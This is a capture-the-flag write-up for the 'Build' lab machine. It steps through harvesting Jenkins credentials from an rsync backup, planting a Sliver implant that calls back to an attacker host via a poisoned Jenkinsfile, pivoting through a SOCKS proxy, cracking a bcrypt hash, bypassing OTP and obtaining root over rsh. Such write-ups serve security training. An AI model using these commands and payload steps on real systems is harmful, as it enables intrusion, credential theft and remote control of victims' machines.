Skip to main content

Machine (Easy) - Build

Writeup for the Build machine, an easy-level challenge focused on exploiting exposed services and misconfigurations to gain root access.

Writeup Author: BobBuilder

Objective: Gain a root shell on the target by abusing exposed rsync backups, injecting a payload through Jenkins, pivoting into the internal network, and exploiting misconfigured services to escalate privileges.

Category Difficulty Platform Machine Author
Machine Easy Windows xct

User

Enumeration

Identify exposed RPC services and rsync shares:

rpcinfo -p <build_ip>
rsync <build_ip>::

List contents of the backups share:

rsync <build_ip>::backups

Download the Jenkins backup archive:

rsync -avzP <build_ip>::backups/jenkins.tar.gz

Initial Access

Extract the archive and locate stored Jenkins credentials:

cat jenkins_configuration/jobs/build/config.xml

Decrypt the stored Jenkins password:

python invoke.py \
  --master-key ./master.key \
  --hudson-secret-key ./hudson.util.Secret \
  --action decrypt '{AQAAABAAAAAQUNB...}'

Clone the Git repository using the recovered credentials:

git clone 'http://<username>:<password>@<build_ip>:3000/buildadm/dev.git'

Generate a Sliver payload:

sliver > generate --os linux --arch 64bit --mtls <attacker_ip> --format elf --reconnect 60 --save htb_sliver

Modify Jenkinsfile to execute the payload:

stage('Do nothing') {
  steps {
    sh 'chmod +x htb_sliver && ./htb_sliver'
  }
}

Push the malicious commit to trigger code execution:

git add htb_sliver
git commit -am "trigger sliver"
git push

Root

Start a SOCKS proxy from the active Sliver session:

socks5 start

Configure proxychains:

echo 'socks5 127.0.0.1 1081' | sudo tee -a /etc/proxychains4.conf

Scan the internal network via proxy:

proxychains4 nmap -p- 172.18.0.1

Privilege Escalation

Connect to internal MySQL service:

proxychains4 mysql -h 172.18.0.1 -u root

Dump the PowerDNS Admin user table:

USE powerdnsadmin;
SELECT * FROM user;

Crack the retrieved bcrypt hash:

hashcat -a0 -m 3200 '$2b$12$...' rockyou.txt

Access the PowerDNS Admin interface (via proxy):

http://172.18.0.6/login

Bypass OTP using a blank or space character (per known issue).

Update /etc/hosts with DNS mapping:

echo "<admin_ip> admin.build.vl" | sudo tee -a /etc/hosts

Flag Retrieval

Access remote root shell via rsh:

rsh -l root admin.build.vl
Back to top